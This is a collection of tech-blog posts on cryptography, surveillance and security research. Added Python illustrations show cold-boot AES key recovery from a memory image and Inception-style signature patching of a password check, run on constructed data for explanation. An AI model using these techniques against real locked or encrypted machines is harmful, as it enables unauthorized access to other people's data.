
Unknown mathematician makes historical breakthrough in prime theory

Yitang Zhang is a largely unknown mathematician who has struggled to find an academic job after he got his PhD, working at a Subway sandwich shop before getting a gig as a lecturer at the University of New Hampshire. He's just had a paper accepted for publication in Annals of Mathematics, which appears to make a breakthrough towards proving one of mathematics' oldest, most difficult, and most significant conjectures, concerning "twin" prime numbers. According to the Simons Science News article, Zhang is shy, but is a very good, clear writer and lecturer.

For hundreds of years, mathematicians have speculated that there are infinitely many twin prime pairs. In 1849, French mathematician Alphonse de Polignac extended this conjecture to the idea that there should be infinitely many prime pairs for any possible finite gap, not just 2.

Since that time, the intrinsic appeal of these conjectures has given them the status of a mathematical holy grail, even though they have no known applications. But despite many efforts at proving them, mathematicians weren’t able to rule out the possibility that the gaps between primes grow and grow, eventually exceeding any particular bound.

Now Zhang has broken through this barrier. His paper shows that there is some number N smaller than 70 million such that there are infinitely many pairs of primes that differ by N. No matter how far you go into the deserts of the truly gargantuan prime numbers — no matter how sparse the primes become — you will keep finding prime pairs that differ by less than 70 million.

The result is “astounding,” said Daniel Goldston, a number theorist at San Jose State University. “It’s one of those problems you weren’t sure people would ever be able to solve.”

Unknown Mathematician Proves Elusive Property of Prime Numbers [Erica Klarreich/Wired/Simons Science News]

(Photo: University of New Hampshire)

3D printed guns and the law: will judges be able to think clearly about digital files when guns are involved?

My latest Guardian column is "3D printed guns are going to create big legal precedents," and it looks at an underappreciated risk from 3D printed guns: that courts will be so freaked out by the idea of 3D printed guns that they'll issue reactionary decisions that are bad for the health of the Internet and its users:

More interesting is the destiny of the files describing 3D printed guns. These model-files have been temporarily removed from the internet at the behest of the US State Department, which is investigating the possibility that they violate the International Traffic in Arms Regulations. Wilson says that he's on safe ground here, because the regulations do not cover material in a library, and he says the internet is like a library. As this is taking place in the US, there's also the First Amendment to be considered, which limits government regulation of speech.

Here's where things get scary for me. Defense Distributed is headed for some important, possibly precedent-setting legal battles with the US government, and I'm worried that the fact that we're talking about guns here will cloud judges' minds. Bad cases made bad law, and it's hard to think of a more emotionally overheated subject area. So while I'd love to see a court evaluate whether the internet should be treated as a library in law, I'm worried that when it comes to guns, the judge may find himself framing the question in terms of whether a gun foundry should be treated as a library.

3D printed guns are going to create big legal precedents

Apple can decrypt iPhones for cops; Google can remotely "reset password" for Android devices

Apple apparently has the power to decrypt iPhone storage in response to law-enforcement requests, though they won't say how. Google can remotely "reset the password" for a phone for cops, too:

Last year, leaked training materials prepared by the Sacramento sheriff's office included a form that would require Apple to "assist law enforcement agents" with "bypassing the cell phone user's passcode so that the agents may search the iPhone." Google takes a more privacy-protective approach: it "resets the password and further provides the reset password to law enforcement," the materials say, which has the side effect of notifying the user that his or her cell phone has been compromised.

Ginger Colbrun, ATF's public affairs chief, told CNET that "ATF cannot discuss specifics of ongoing investigations or litigation. ATF follows federal law and DOJ/department-wide policy on access to all communication devices."

...The ATF's Maynard said in an affidavit for the Kentucky case that Apple "has the capabilities to bypass the security software" and "download the contents of the phone to an external memory device." Chang, the Apple legal specialist, told him that "once the Apple analyst bypasses the passcode, the data will be downloaded onto a USB external drive" and delivered to the ATF.

It's not clear whether that means Apple has created a backdoor for police -- which has been the topic of speculation in the past -- whether the company has custom hardware that's faster at decryption, or whether it simply is more skilled at using the same procedures available to the government. Apple declined to discuss its law enforcement policies when contacted this week by CNET.

It's not clear to me from the above whether Google "resetting the password" for Android devices merely bypasses the lock-screen or actually decrypts the mass storage on the phone if it has been encrypted.

I also wonder if the "decryption" Apple undertakes relies on people habitually using short passwords for their phones -- the alternative being a lot of screen-typing in order to place a call.

Apple deluged by police demands to decrypt iPhones [Declan McCullagh/CNet]

(via /.)

Ben Laurie on BitCoin

I wrote yesterday about Dan Kaminsky's excellent thoughts on BitCoin, and wished aloud for comparable work from Ben Laurie. It turns out such work exists: here's Ben's critique of BitCoin, and here's his proposal for an alternative. Both are short, clear, excellent reads. Cory

How cognitive blind-spots compromise security systems

Tanya Khovanova has a fascinating and illuminating story about the blind-spots that can leave security systems vulnerable. She describes a clever one-way function using real-world tools:

Silvio Micali taught me cryptography. To explain one-way functions, he gave the following example of encryption. Alice and Bob procure the same edition of the white pages book for a particular town, say Cambridge. For each letter Alice wants to encrypt, she finds a person in the book whose last name starts with this letter and uses his/her phone number as the encryption of that letter.

To decrypt the message Bob has to read through the whole book to find all the numbers. The decryption will take a lot more time than the encryption. If the book increases in size the time it takes Alice to do the encryption almost doesn’t increase, but the decryption process becomes more and more draining.

This example is very good for teaching one-way functions to non-mathematicians. Unfortunately, the technology changes and the example that Micali taught me fifteen years ago isn’t so cute anymore. Indeed you can do a reverse look-up online of every phone number in the white pages.

Then she explains how a student pointed out her own blind-spot that made the system trivial to defeat:

I still use this example, with an assumption that there is no reverse look-up. I recently taught it to my AMSA students. And one of my 8th graders said, “If I were Bob, I would just call all the phone numbers and ask their last names.”

In the fifteen years since I’ve been using this example, this idea never occurred to me. I am very shy so it would never enter my mind to call a stranger and ask for their last name. My student made me realize that my own personality affected my mathematical inventiveness.

As Bruce Schneier points out, the young student is demonstrating "security mindset," imagining an attack on a security system that works on the weakest flank.
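Micali's phone-book function as code, added here to make the cost asymmetry (and its collapse) concrete; this is not Khovanova's or Micali's own material, and the directory is constructed at random. Alice encrypts with a cheap lookup into a book indexed by first letter; Bob, who has no index, scans the whole book per letter; anyone with a reverse index (the online lookup, or the 8th grader's phone call) is back to one operation per letter, which is exactly how precomputed tables defeat any "one-way" function whose range is small enough to enumerate.

```python
"""Phone-book 'one-way function': cheap forward lookup, expensive inverse scan,
until a reverse index exists. Added illustration with a constructed directory."""
import random

LETTERS = "abcdefghijklmnopqrstuvwxyz"


def make_directory(n, seed=0):
    """Constructed white pages: n (last_name, phone) pairs with unique phone numbers."""
    rng = random.Random(seed)
    phones = rng.sample(range(10_000_000), n)           # unique, like real listings
    names = ["".join(rng.choice(LETTERS) for _ in range(6)) for _ in range(n)]
    return sorted(zip(names, phones))                   # the book is sorted by surname


def first_letter_index(book):
    """Alice's view: the book is sorted, so all numbers for a letter are one lookup away."""
    idx = {}
    for name, phone in book:
        idx.setdefault(name[0], []).append(phone)
    return idx


def encrypt(index, plaintext, rng):
    """One phone number per letter, chosen at random among the matching surnames.
    Randomised: the same letter encrypts to different numbers each time."""
    return [rng.choice(index[ch]) for ch in plaintext]


def decrypt_scan(book, ciphertext):
    """Bob's job: read through the book for each number.
    Returns (plaintext, entries examined) so the cost is visible."""
    work, out = 0, []
    for phone in ciphertext:
        for name, p in book:
            work += 1
            if p == phone:
                out.append(name[0])
                break
    return "".join(out), work


def reverse_index(book):
    """What the online reverse lookup (or a phone call) gives the attacker."""
    return {phone: name for name, phone in book}


def decrypt_reverse(rev, ciphertext):
    """With a reverse index, decryption costs one lookup per letter."""
    return "".join(rev[phone][0] for phone in ciphertext), len(ciphertext)


BOOK = make_directory(5000)
INDEX = first_letter_index(BOOK)
REVERSE = reverse_index(BOOK)
CIPHERTEXT = encrypt(INDEX, "attack", random.Random(1))

if __name__ == "__main__":
    print("scan:   ", decrypt_scan(BOOK, CIPHERTEXT))
    print("reverse:", decrypt_reverse(REVERSE, CIPHERTEXT))
```

Doubling the book size roughly doubles the scan cost and leaves both the encryption and the reverse-index decryption unchanged, which is the whole argument of the example, and its weakness.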

One-Way Functions (via Schneier)

Numbers stations on Twitter and other spook-y tweets

Ken Layne takes us on a tour of weird, possibly espionage-related Twitter accounts, from a "numbers station" that has tweeted 318,000 hexadecimal numbers since 2009 (possibly from Khabarovsk), to a "joke" CIA account that seems to have a lot of inside dope, to a massive cluster of accounts that tweet nothing but "Iowa City schools ask state for an audit," over and over again.

Here are some of the 38 followers of an inscrutable account called @googuns_staging—many of these are obvious fraudulent accounts with randomly generated profiles such as, "I like Jonathan Richman/The Modern Lovers to listen and Lord of the Rings: The Return of the King, The to watch. I'm brave and chivalrous." Well, of course you are!

GooGuns posts nothing but strings of letters and numbers, like b39e65fa00000000 in intervals of about five minutes on average. The string of characters always ends with zeroes, occasionally with the location service turned on, so you can see that 554705fa00000000 was allegedly tweeted from the "Region of Khabarovsk." This has been going on all day and all night, for years, with more than 318,000 tweets posted since 2009. But why?

There is an iOS game called GooGun with its own website and a dubious iTunes graphic with the words "No Longer Available" over it. "Space robots are attacking," says the promotional video showing game play on this game that is not available to play.

The Real Weird Twitter Is Espionage Twitter [Ken Layne/The Awl] (via Wil Wheaton)

Access files on locked, encrypted Android phones by putting them in a freezer for an hour


This is alarming, if true: according to a group of German security researchers at the University of Erlangen, if you cool a locked, encrypted Android phone in a freezer for about an hour and then quickly reboot it and plug it into a laptop, the chilled RAM keeps its contents long enough for a custom recovery image to read the disk-encryption key out of memory and boot the phone with all of its files accessible in the clear. The attack is called FROST ("Forensic Recovery Of Scrambled Telephones"). Recovering the disk-encryption key this way requires a phone whose bootloader is already unlocked; the researchers say that other data still sitting in RAM (contacts, browsing history, photos) can be pulled even from a phone with a locked bootloader.

At the end of 2011, Google released version 4.0 of its Android operating system for smartphones. For the first time, Android smartphone owners were supplied with a disk encryption feature that transparently scrambles user partitions, thus protecting sensitive user information against targeted attacks that bypass screen locks. On the downside, scrambled telephones are a nightmare for IT forensics and law enforcement, because once the power of a scrambled device is cut any chance other than bruteforce is lost to recover data.

We present FROST, a tool set that supports the forensic recovery of scrambled telephones. To this end we perform cold boot attacks against Android smartphones and retrieve disk encryption keys from RAM. We show that cold boot attacks against Android phones are generally possible for the first time, and we perform our attacks practically against Galaxy Nexus devices from Samsung. To break disk encryption, the bootloader must be unlocked before the attack because scrambled user partitions are wiped during unlocking. However, we show that cold boot attacks are more generic and allow the retrieval of sensitive information, such as contact lists, visited web sites, and photos, directly from RAM, even though the bootloader is locked.
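An added illustration of the "retrieve disk encryption keys from RAM" step, not FROST's own tool set: this is the key-schedule search from Halderman et al.'s cold-boot work, which is the standard way such tools locate AES keys. An AES-128 key in use sits in memory next to its 160-byte expanded round-key schedule, so scanning a dump for any 16-byte window whose expansion matches what follows it finds the key without knowing anything else about the layout. The memory image below is constructed (random filler, one planted schedule, a few flipped bits to mimic charge decay after the reboot), and the scanner tolerates a handful of decayed bytes, which is the edge case that matters in practice.

```python
"""Cold-boot key recovery: find AES-128 keys in a RAM image by locating their
expanded key schedules. Added illustration; the image below is constructed."""
import random


def _xtime(b):
    """Multiply by x in GF(2^8) with the AES reduction polynomial."""
    return ((b << 1) ^ (0x1b if b & 0x80 else 0)) & 0xff


def _build_sbox():
    """Derive the AES S-box: inverse in GF(2^8) followed by the affine map."""
    exp, log = [0] * 256, [0] * 256
    x = 1
    for i in range(255):
        exp[i], log[x] = x, i
        x ^= _xtime(x)                       # step by the generator 0x03
    sbox = [0] * 256
    for v in range(256):
        inv = 0 if v == 0 else exp[(255 - log[v]) % 255]
        s = acc = inv
        for _ in range(4):                   # acc = b ^ rotl1 ^ rotl2 ^ rotl3 ^ rotl4
            s = ((s << 1) | (s >> 7)) & 0xff
            acc ^= s
        sbox[v] = acc ^ 0x63
    return sbox


SBOX = _build_sbox()


def expand_key(key):
    """FIPS-197 AES-128 key expansion: 16-byte key -> 176-byte round-key schedule."""
    assert len(key) == 16
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord, then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return bytes(b for word in w for b in word)


def schedule_mismatches(image, off):
    """How many of the 160 bytes after `off` disagree with the expansion of the
    16 candidate key bytes at `off`. 0 is pristine; a few means bit decay."""
    expected = expand_key(image[off:off + 16])[16:]
    actual = image[off + 16:off + 176]
    return sum(1 for a, b in zip(expected, actual) if a != b)


def find_aes128_keys(image, max_bad=4, step=4):
    """Return [(offset, key)] for every window that is followed by (something close
    to) its own key schedule, tolerating up to max_bad decayed bytes."""
    hits = []
    for off in range(0, len(image) - 176 + 1, step):
        if schedule_mismatches(image, off) <= max_bad:
            hits.append((off, image[off:off + 16]))
    return hits


KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")   # demo key, not from any device


def build_demo_image(size=8192, offset=1000, flips=3, seed=1):
    """Constructed 'RAM dump': random filler, KEY's schedule planted at `offset`,
    and `flips` single-bit errors in the schedule to mimic post-reboot decay."""
    rng = random.Random(seed)
    img = bytearray(rng.getrandbits(8) for _ in range(size))
    img[offset:offset + 176] = expand_key(KEY)
    for pos in rng.sample(range(offset + 16, offset + 176), flips):
        img[pos] ^= 1 << rng.randrange(8)
    return bytes(img)


IMAGE = build_demo_image()

if __name__ == "__main__":
    for off, key in find_aes128_keys(IMAGE):
        print(f"key schedule at offset {off:#x}: key = {key.hex()}, "
              f"{schedule_mismatches(IMAGE, off)} decayed byte(s)")
```

Real dumps are larger and the key bytes themselves can decay too; the published tools handle that by correcting the key from the redundant schedule rather than trusting the first 16 bytes, which this illustration does not do.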

FROST: Forensic Recovery Of Scrambled Telephones

Cypherpunks: articulates and challenges Internet freedom


Cypherpunks -- a quick, stirring, scary read -- transcribes a wide-ranging conversation between Wikileaks co-founder Julian Assange, Jacob Appelbaum (Wikileaks/Tor Project), Andy Müller-Maguhn (Chaos Computer Club) and Jérémie Zimmermann (La Quadrature Du Net).

Edited together in thematic chapters (The Militarization of Cyberspace, Fighting Total Surveillance With the Laws of Physics, Private Sector Spying), Cypherpunks exceeded my expectations. I know some of the book's protagonists personally and know how smart and principled they are. But I was afraid, going into this, that what would emerge would be a kind of preaching-to-the-choir consensus, because all four of the participants are on the same side.

Instead, I found Cypherpunks to be a genuine debate, where each speaker's best arguments -- well-polished, well-spoken, and convincing -- were mercilessly tested by the others, who subjected them to hard questions and rigorous inspection. Most of our discussions about Wikileaks lack nuance, and they're often hijacked by personal questions about Assange. Whatever you feel about Assange, he is not Wikileaks -- Wikileaks is an activity, not an organization, and its participants, including Bradley Manning, are engaged in something important and difficult and fraught, and there is a place for a debate about whether the tactics of Wikileaks best serve the strategic end of a free and open Internet in a just and humane society.

The debate recorded in Cypherpunks -- though leavened with humor and easy to follow -- covers a lot of nuance of the sort that has been missing from the discussion. The wider points -- that the universe's in-built mathematics favor the keeping of secrets because it is easier to encrypt a message than decrypt it, say -- may dazzle, but the getting down to cases afterward, the chewing the point over and challenging it, that's where the book shines.

There aren't many titles that pack as much argument, ambiguity and theory into as small a package as Cypherpunks. It's a book you can read in an hour or two, but you'll be thinking about it for years.

Cypherpunks

Letter from a young Homeland reader

As you've no doubt gleaned, I'm on tour with my new novel, Homeland. A lot of people commiserate with me about the grueling pace -- and it is! a new city practically every day and nowhere near enough sleep and continuous interviews and presentations from o-dark hundred to late at night -- but for all that, it's actually something I love. That's because I get to meet readers, especially young readers (I do a lot of school presentations) and readers tell me about how my books have affected them, and it's generally both humbling and delightful.

But every now and again, I hear from a reader whose description of her or his experience with my work leaves me, well, speechless. This is one such letter, from a young man named Brian, who emailed me this morning, and graciously gave me permission to post his letter. I'm posting it to let you know -- and to remind me -- that for all that touring is sometimes a lot of work, the end result is that my books end up in the hands of people for whom they can be revelatory. It's such an awesome responsibility, and such a wonderful one. Thank you, Brian.

Read the rest

SkypeHide promises to hide secret messages in silent Skype packets, even when authorities are listening

Buzzing around the internet this week: Polish security researcher and professor Wojciech Mazurczyk claims to be developing a way to hide secret, un-eavesdroppable messages in "silent" packets transmitted within Skype conversations. He and his team plan to present SkypeHide at a steganography conference in Montpellier, France, this coming June. VentureBeat has a writeup here. The ease with which Skype can be snooped by law enforcement is well-known. I'll be interested to hear what other security researchers make of Mazurczyk's project, when and if it is eventually released.

Inception: a tool for compromising the slumber of computers with full-disk encryption


Inception is a tool for breaking into computers with full-disk encryption. It assumes that you have physical access to a suspended or screen-locked computer whose disk is encrypted. You connect to the machine over its FireWire interface (or, if it doesn't have FireWire, you plug a FireWire card into one of its expansion slots, and the operating system will automatically install and configure the drivers, even while locked or asleep), use FireWire's direct memory access to read and write system memory, and from there patch the password-checking routine and walk straight into the computer.

This (and its predecessors, like winlockpwn) is a substantial advance on previous attacks against sleeping full-disk encrypted systems, which involved things like plunging the RAM into a bath of liquid nitrogen. As the author, Carsten Maartmann-Moe, points out, this can't be easily remedied with a FireWire driver update, since FireWire requires direct memory access to effect high-speed transfers.

So, two things: First, shut down your computer when it's not in your possession; second, "Inception" is an inspired name for an attack that breaks into the dreams of a sleeping computer, directly accesses its memory, and causes it to spill its secrets.

Inception’s main mode works as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim. Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s password authentication modules. Once found, the tool short circuits the code that is triggered if an incorrect password is entered.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the nerdy equivalent of a memory inception.

After running the tool you should be able to log into the victim machine using any password.
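The scan-and-patch step in the quoted description, as an added illustration rather than Inception's own code: a wildcard byte signature is matched page by page across a memory image, and a patch is written at a fixed offset from each match. Everything here is constructed: the 32-bit x86 "password check" fragment, the signature for it, and the random filler it is planted in (deliberately straddling a page boundary, a case the page-by-page reader has to handle). In the real attack the reads and writes go over FireWire DMA instead of a Python bytes object, and the targets are real authentication modules rather than this sixteen-byte stand-in.

```python
"""Wildcard signature scan and patch over a memory image, the shape of what
Inception does over DMA. Added illustration with a constructed image and target."""
import random

PAGE = 4096


def parse_signature(sig):
    """'85 c0 75 ?? b8' -> [0x85, 0xc0, 0x75, None, 0xb8]; '??' is a wildcard byte."""
    return [None if tok == "??" else int(tok, 16) for tok in sig.split()]


def find_signature(image, pattern, page_size=PAGE):
    """Yield every offset where `pattern` matches. Reads one page at a time, with a
    small overlap so a match straddling a page boundary is not missed, the way a
    tool that pulls memory over DMA page by page would."""
    n = len(pattern)
    for page in range(0, len(image), page_size):
        chunk = image[page:page + page_size + n - 1]
        for i in range(min(page_size, len(chunk) - n + 1)):
            if all(p is None or chunk[i + j] == p for j, p in enumerate(pattern)):
                yield page + i


def patch(image, offset, new_bytes):
    """Return a copy of `image` with `new_bytes` written at `offset` (a DMA write for real)."""
    buf = bytearray(image)
    buf[offset:offset + len(new_bytes)] = new_bytes
    return bytes(buf)


# Constructed x86 'password check'. eax holds the compare result (0 = password
# matched). The routine returns 1 on success and 0 on failure.
CHECK = bytes.fromhex(
    "85c0"          # test eax, eax
    "7506"          # jne  fail        <- taken when the password is wrong
    "b801000000"    # mov  eax, 1
    "c3"            # ret
    "b800000000"    # fail: mov eax, 0
    "c3"            # ret
)
SIGNATURE = "85 c0 75 ?? b8 01 00 00 00"   # wildcard the jump displacement
PATCH_OFFSET, PATCH = 2, b"\x90\x90"       # overwrite 'jne fail' with two nops


def run_fragment(code, eax):
    """Tiny interpreter for just the opcodes in CHECK, enough to show what the
    check returns before and after patching. Not a general emulator."""
    ip, zf = 0, 0
    while True:
        op = code[ip]
        if code[ip:ip + 2] == b"\x85\xc0":            # test eax, eax
            zf, ip = (1 if eax == 0 else 0), ip + 2
        elif op == 0x75:                                # jne rel8
            rel = code[ip + 1]
            ip += 2
            if not zf:
                ip += rel - 256 if rel > 127 else rel
        elif op == 0xb8:                                # mov eax, imm32
            eax, ip = int.from_bytes(code[ip + 1:ip + 5], "little"), ip + 5
        elif op == 0x90:                                # nop
            ip += 1
        elif op == 0xc3:                                # ret
            return eax
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at {ip}")


CHECK_OFFSET = 3 * PAGE - 6      # plant the fragment across a page boundary


def build_demo_image(seed=7, pages=4):
    """Constructed 'RAM': random filler with CHECK planted at CHECK_OFFSET."""
    rng = random.Random(seed)
    img = bytearray(rng.getrandbits(8) for _ in range(pages * PAGE))
    img[CHECK_OFFSET:CHECK_OFFSET + len(CHECK)] = CHECK
    return bytes(img)


def apply_password_patch(image):
    """Find every copy of the check and neutralise its failure branch.
    Returns (patched_image, offsets_patched)."""
    offsets = list(find_signature(image, parse_signature(SIGNATURE)))
    for off in offsets:
        image = patch(image, off + PATCH_OFFSET, PATCH)
    return image, offsets


IMAGE = build_demo_image()

if __name__ == "__main__":
    patched, offsets = apply_password_patch(IMAGE)
    for off in offsets:
        before = run_fragment(IMAGE[off:off + len(CHECK)], 7)
        after = run_fragment(patched[off:off + len(CHECK)], 7)
        print(f"check at {off:#x}: wrong password returns {before} before the patch, {after} after")
```

Wildcarding the displacement is what lets one signature survive small differences between builds of the same module; the trade-off is that a loose pattern can also match unrelated code, which is why real target definitions pin several bytes around the branch rather than the branch alone.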

Inception (via JWZ)

Great Firewall of China nukes VPNs on sight

A new revision of the Great Firewall of China seeks out VPN connections (including, I assume, connections over The Onion Router) and terminates them. Only companies that register official VPNs with the Chinese government will be able to run them without interference. Registration is only available to Chinese companies, and I'll bet it involves escrowing your keys with the Chinese net-cops so they can spy on the traffic.

Users in China suspected in May 2011 that the government there was trying to disrupt VPN use, and now VPN providers have begun to notice the effects.

Astrill, a VPN provider for users inside and outside China, has emailed its users to warn them that the "Great Firewall" system is blocking at least four of the common protocols used by VPNs, which means that they don't function. "This GFW update makes a lot of harm to business in China," the email says. "We believe [the] China censorship minister is a smart man … and this blockage will be removed and things will go back to normal."

But the company added that trying to stay ahead of the censors is a "cat-and-mouse game" – although it is working on a new system that it hopes will let it stay ahead of the detection system.

China tightens 'Great Firewall' internet control with new technology [Charles Arthur/The Guardian]

Crypto and Bletchley Park podcast from BBC's Infinite Monkey Cage


BBC Radio 4's great math and science show "The Infinite Monkey Cage" did a great (and very funny) episode on crypto and Bletchley Park, with Robin Ince, Brian Cox, Dave Gorman, Simon Singh and Dr Sue Black.

Secret Science

MP3

(via Schneier)

Amazing, invisible work that goes on when you click an HTTPS link


Jeff Moser has a clear, fascinating enumeration of all the incredible math stuff that happens between a server and your browser when you click on an HTTPS link and open a secure connection to a remote end. It's one of the most important (and least understood) parts of the technical functioning of the Internet.

People sometimes wonder if math has any relevance to programming. Certificates give a very practical example of applied math. Amazon's certificate tells us that we should use the RSA algorithm to check the signature. RSA was created in the 1970's by MIT professors Ron *R*ivest, Adi *S*hamir, and Len *A*dleman who found a clever way to combine ideas spanning 2000 years of math development to come up with a beautifully simple algorithm:

You pick two huge prime numbers "p" and "q." Multiply them to get "n = p*q." Next, you pick a small public exponent "e" which is the "encryption exponent" and a specially crafted inverse of "e" called "d" as the "decryption exponent." You then make "n" and "e" public and keep "d" as secret as you possibly can and then throw away "p" and "q" (or keep them as secret as "d"). It's really important to remember that "e" and "d" are inverses of each other.

Now, if you have some message, you just need to interpret its bytes as a number "M." If you want to "encrypt" a message to create a "ciphertext", you'd calculate:

$$C \equiv M^e \pmod{n}$$

This means that you multiply "M" by itself "e" times. The "mod n" means that we only take the remainder (e.g. "modulus") when dividing by "n." For example, 11 AM + 3 hours ≡ 2 (PM) (mod 12 hours). The recipient knows "d" which allows them to invert the message to recover the original message:

$$C^d \equiv (M^e)^d \equiv M^{ed} \equiv M^1 \equiv M \pmod{n}$$
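The quantities above (p, q, n, e, d) carried through in working code, as an added illustration that is not part of Moser's article: key generation with d computed as the inverse of e modulo (p-1)(q-1), the encrypt/decrypt pair, and the signature check a browser performs on a certificate, which is the same exponentiation with the roles of the exponents swapped. The primes are two Mersenne primes chosen for the demo and are far too small for real keys; the last result also shows why textbook RSA is never used without padding: multiplying two ciphertexts yields a valid ciphertext of the product of the plaintexts.

```python
"""Textbook RSA with the symbols used above: p, q, n = p*q, e, and d with
e*d ≡ 1 (mod (p-1)(q-1)). Added illustration using only the standard library."""
from math import gcd

P, Q = 2**31 - 1, 2**61 - 1      # demo primes (both prime); real keys use ~1024-bit p and q


def keygen(p, q, e=65537):
    """Return ((n, e), d). d is the inverse of e modulo phi = (p-1)(q-1)."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)          # modular inverse (Python 3.8+)
    return (n, e), d


def encrypt(pub, m):
    """C ≡ M^e (mod n). Textbook form: no padding, so for illustration only."""
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("message must be an integer below n")
    return pow(m, e, n)


def decrypt(priv, c):
    """M ≡ C^d (mod n)."""
    n, d = priv
    return pow(c, d, n)


def sign(priv, m):
    """Signing uses the private exponent on the (hash of the) message."""
    n, d = priv
    return pow(m, d, n)


def verify(pub, m, s):
    """The certificate check: raise the signature to e and compare with the message."""
    n, e = pub
    return pow(s, e, n) == m


def demo(msg=b"Hello!"):
    """Round-trip a short message, sign and verify it, and show the homomorphic
    property that padding schemes exist to block."""
    pub, d = keygen(P, Q)
    n, e = pub
    priv = (n, d)
    m = int.from_bytes(msg, "big")               # the message's bytes read as the number M
    c = encrypt(pub, m)
    recovered = decrypt(priv, c).to_bytes(len(msg), "big")
    s = sign(priv, m)
    c2 = encrypt(pub, 12345)                      # a second ciphertext the attacker has seen
    forged = (c * c2) % n                         # no private key involved
    return {
        "roundtrip_ok": recovered == msg,
        "signature_ok": verify(pub, m, s),
        "tampered_rejected": not verify(pub, m + 1, s),
        "forged_ciphertext_decrypts_to_product": decrypt(priv, forged) == (m * 12345) % n,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

In a real TLS handshake the message being verified is a hash of the certificate's contents wrapped in a padding structure (PKCS#1 v1.5 or PSS), and encryption, where RSA is still used for it, goes through OAEP; the bare exponentiations here are the mathematics those layers sit on, not something to deploy.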

The First Few Milliseconds of an HTTPS Connection (via O'Reilly Radar)

Internet of the Dead: the net's collision course with death

My latest Locus magazine column is "The Internet of the Dead," which discusses the collision course the Internet is on with death. It was inspired by my work to preserve the personal data of my old friend Erik "Possum Man" Stewart, who died unexpectedly and tragically in June:

It was while I sat in Possum’s room that I began to think about his computer. It was a homemade Franken-PC that sat under his desk, its wheezy fan making a racket like an ancient refrigerator. After I’d left Possum’s house and headed back to the airport, I got to thinking about that computer. I strongly suspected that Possum would have copied over all the data of his life – all the e-mails and lists and photos and movies and programs and essays and stories and, well, *everything* – onto each new machine, keeping it all live and handy. After all, hard-drives are cheap – especially if you’re building your own tower PC with lots of full-height drive bays – and their capacity increases exponentially, year on year. It’s been a long time since it made sense to keep your archives in a shoebox full of Zip cartridges or floppy drives. If you buy a PC every couple of years, your new machine will almost certainly have more than twice the hard-drive space of your old one. Keeping your data on your live, spinning platter means that it will get saved every time you do your regular backup (assuming you perform this essential ritual!), and if the drive starts to fail, you’ll know about it right away. It’s not like dragging an old floppy out of a dusty box and praying that it hasn’t succumbed to bitrot since it was put away.

Possum never uploaded his consciousness to a computer, but he approximated such a transfer, one keystroke at a time, year after year, filling those noisy, full-height drives with all his secrets, all his creative outpourings, all his minutiae and mundane trivialities and extraordinary profundities. It’s a transfer we’re all effecting, but Possum got a head start on most of us, kicking off the project in the 1980s. That homely, rackety tower under Possum’s desk was him, in some important sense – in the same sense that my laptop holds a good deal of what it means to be me.

Cory Doctorow: The Internet of the Dead
